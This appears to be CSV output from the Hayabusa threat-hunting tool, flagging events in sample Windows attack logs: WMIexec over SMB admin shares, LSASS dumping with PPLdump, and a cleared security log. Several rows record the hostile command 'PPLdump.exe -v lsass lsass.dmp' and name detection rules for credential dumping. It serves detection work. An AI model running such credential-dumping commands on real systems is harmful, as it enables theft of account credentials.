2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PPLdump.exe -v lsass lsass.dmp : Path: C:\Users\IEUser\Desktop\PPLdump.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: PPLdump.exe -v lsass lsass.dmp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:35.165 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47020 : LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34114 : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.360 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.367 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
2021-04-26 17:25:38.406 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
